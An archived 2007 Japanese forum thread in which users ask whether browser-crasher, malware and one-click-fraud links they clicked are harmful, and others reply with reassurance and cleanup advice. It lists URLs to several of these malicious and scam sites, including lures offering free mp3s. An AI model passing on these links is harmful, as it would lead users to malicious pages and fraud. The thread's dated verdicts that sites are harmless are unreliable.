純粋なブラクラなのでシステム感染は無い
電源切るのはアレだがその措置で十分
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
>>259
何という重いブログ…画像貼りすぎだろ…
ここまで来ると嫌がらせに近いな
261:名無しさん@お腹いっぱい。
07/01/25 22:41:01
URLリンク(up2.viploader.net)
URLリンク(up2.viploader.net)
多分>>4なんですが実害ありますか?
バスター2006無反応
ウイルスコードらしき文字列の画面
262:名無しさん@お腹いっぱい。
07/01/25 23:11:42
追記です
OS XPSP2
ブラウザ IE6 拡張子ではなく、内容(ryは無効
初めて踏んだんでびびりました('A`)
263:名無しさん@お腹いっぱい。
07/01/26 00:59:36
やっとロダに繋がった…
>>261-262
いわゆる「ノートントラップ」
実体はただのテキストファイルでアンチウイルスが反応する文字列が
ずらずらと書いてあるだけの代物
踏んでも実害は無い。放置でおk
264:名無しさん@お腹いっぱい。
07/01/26 01:07:43
>>263
レスサンクスです
265:258
07/01/26 15:25:01
>>260
レスありがとうございます。安心しました。
266:名無しさん@お腹いっぱい。
07/01/26 22:34:23
マシンがPen4 3.4 RAM1.5Gなのでそれほど重いとは感じないけど
2006に戻そうか考え中
Pen4 2.2では多少だるさが感じるので一気に全部2006に戻そうかな?
267:名無しさん@お腹いっぱい。
07/01/26 23:48:34
URLリンク(chiffon.ty.land.to)
上記をふんでしまいましたが、実害はありますでしょうか?
OS : XP Pro sp2
AntiVirus : Norton(2ヶ月期限切)
WindowsUD:最近してません
上記URLをsleipnirで表示した際,mailtoストーム
Media Player,telnet接続等が発生しました。
4>>だとおもわれますが、最近はこんなのもあるんですね・・・
sleipnirのJavaScript,Active X系はすべてoffで、
プログラムが起動するとは思いませんでした。
268:名無しさん@お腹いっぱい。
07/01/27 12:08:46
>>267
各種ブラクラ+ウイルスサイトの呼び出しがあるので
とりあえずウイルススキャン
運悪くサイトに繋がって且つOSに穴が開いている状況だと感染も有り得る
269:名無しさん@お腹いっぱい。
07/01/27 12:24:03
音楽配信板で踏んじゃいました。
不安です・・・
694 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:08:01 ID:IPqkCJvP0
ここだよ、ここ。皆すごい勢いで落としてる。
スレリンク(wm板)
270:名無しさん@お腹いっぱい。
07/01/27 12:51:23
音楽配信板で踏んじゃいました。
不安です・・・
694 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:08:01 ID:IPqkCJvP0
ここだよ、ここ。皆すごい勢いで落としてる。
スレリンク(wm板)
271:名無しさん@お腹いっぱい。
07/01/27 12:59:01
??
2ちゃんねるのスレッドでしょ?
272:名無しさん@お腹いっぱい。
07/01/27 13:07:42
スイマセン。間違えました。
668 :名無しさん@お腹いっぱい。:2007/01/05(金) 12:20:56 ID:WivsBDHm0
URLリンク(www.mayhem.net)
↑mp3大量 無料
こっちです・・
273:名無しさん@お腹いっぱい。
07/01/27 13:24:27
>>272
変な生き物の画像ウィンドウが音付きで飛び回る
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
の標本No.12
踏んでも特に害は無いよ。Alt+F4 で脱出
274:名無しさん@お腹いっぱい。
07/01/27 13:48:04
>>273
ありがとうございました!
275:名無しさん@お腹いっぱい。
07/01/27 15:13:08
>>268
レスありがとうございます。
定義期限切れですがスキャンで問題なかったので、
解決したことにします。
276:名無しさん@お腹いっぱい。
07/01/27 21:27:26
URLリンク(gazo-xxx.com)
これって詐欺?
277:名無しさん@お腹いっぱい。
07/01/27 22:27:10
ワンクリ詐欺だね
URLリンク(gazo-xxx.com)
ここで「同意」するとそのページに飛ぶ
ページ閉じても復活する所が鬱陶しい
278:名無しさん@お腹いっぱい。
07/01/27 23:28:28
スレリンク(cm板)
これは何でしょうか?
279:名無しさん@お腹いっぱい。
07/01/27 23:32:14
??
2ちゃんねるのスレッドでしょ?
280:名無しさん@お腹いっぱい。
07/01/28 05:11:54
踏んじゃいました・・・情けない・・・うぅぅ
↓のダウンロードって書いてあるところのリンクです。
URLリンク(kasamatusan.sakura.ne.jp)
html見てみたんですけどこれかな?↓
URLリンク(s15.j-a-net.jp)
御願いしますm( __ __ )m
281:名無しさん@お腹いっぱい。
07/01/28 05:18:21
>>280に追記
>>3の一種でしょうか?メディアプレーヤーやtelnetを起動
Outlookに変なニュースグループを作成まで一緒で、最後に音が大音量でした
OSアップデータはしてあります。
ウィルス対策ソフトはウイルスセキュリティーZeroです。
282:名無しさん@お腹いっぱい。
07/01/28 05:55:31
>>280-281
ページタイトル「WELCOME」だから内容は>>171と同じもの
対処法は>>175で
「最後に音が大音量でした」は元ブラクラサイトに置いてあるフラッシュ
(>>175の2)かと
有害といえば有害だがまぁ問題無いかと思われ
心配なら一時ファイル削除して適当なウイルススキャン
スレリンク(sec板:8番)
283:名無しさん@お腹いっぱい。
07/01/28 06:14:37
>>282
ありがとうございますm( __ __ )m
現在VSでのスキャンが完了、感染なし
久しぶりにシマンテックのオンラインスキャンを実行してみたところ
半分スキャンした時点で4個詳細は今のところ不明です。
VSのクオリティーには驚かされます。
284:280
07/01/28 06:37:57
VSで引っかからなかった奴をシマンテックオンラインスキャンで
やってみた結果です。感染は全てgikonaviのdatファイルでした
ウイルス名はWScript.KakWormが3つとVBS.Freelink.B が1つ
これはもしかして、datファイル内にウイルスコードが残ってるって事?
datファイル消したらおkかしら?
285:名無しさん@お腹いっぱい。
07/01/28 06:44:52
あ、すいません上のなしでw
ググったらわかりますた
286:名無しさん@お腹いっぱい。
07/01/30 19:56:11
これ踏んじゃいました。
URLリンク(smart.45.kg)
AVG Free Edition で2個のファイルが隔離されましたが
その後いきなり再起動がかかりました。
AVGでフルスキャンすると
Boot Sector of Drive C が Changed と表示されました。
一応回復コンソールから fixmbr fixboot をやりました。
他にやっておくべきことはありますでしょうか?
287:名無しさん@お腹いっぱい。
07/01/30 22:14:34
>>286
もう消えてるな…
残っていた時は確か>>267辺りとほぼ同内容だったかな
Update怠ってなければ、この類のものを踏んで深刻な状態になる事は
ほぼ無いと思うが…
とりあえず念の為もう一度スキャンかな
スレリンク(sec板:8番)
288:286
07/01/30 22:28:59
ありがとうございます。そこにあるやつをかけてみます。
289:名無しさん@お腹いっぱい。
07/01/31 01:59:06
URLリンク(www.amadorasweb.com)
これ踏んじゃいました
なんかたくさんページが出てきたんですが大丈夫でしょうか?
290:名無しさん@お腹いっぱい。
07/01/31 02:44:48
>>289
呼び出されるサイトがある程度ランダムなので
確実な事は言えないけど、踏んでみた範囲では
即危険性のあるサイトには当たらなかった
ただどっちにしろまともなサイトだとも思えんので
心配なら適当なウイルススキャンはしておいて損は無いかと
(特に開いたページの、どこかリンクを踏んでしまったとかならなおさらの事)
使用ブラウザがIE6以前なのかな?ポップアップブロックのあるブラウザなら
収拾がつかないって事態にはならなかったと思うけど
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
4312日前に更新/246 KB
担当:undef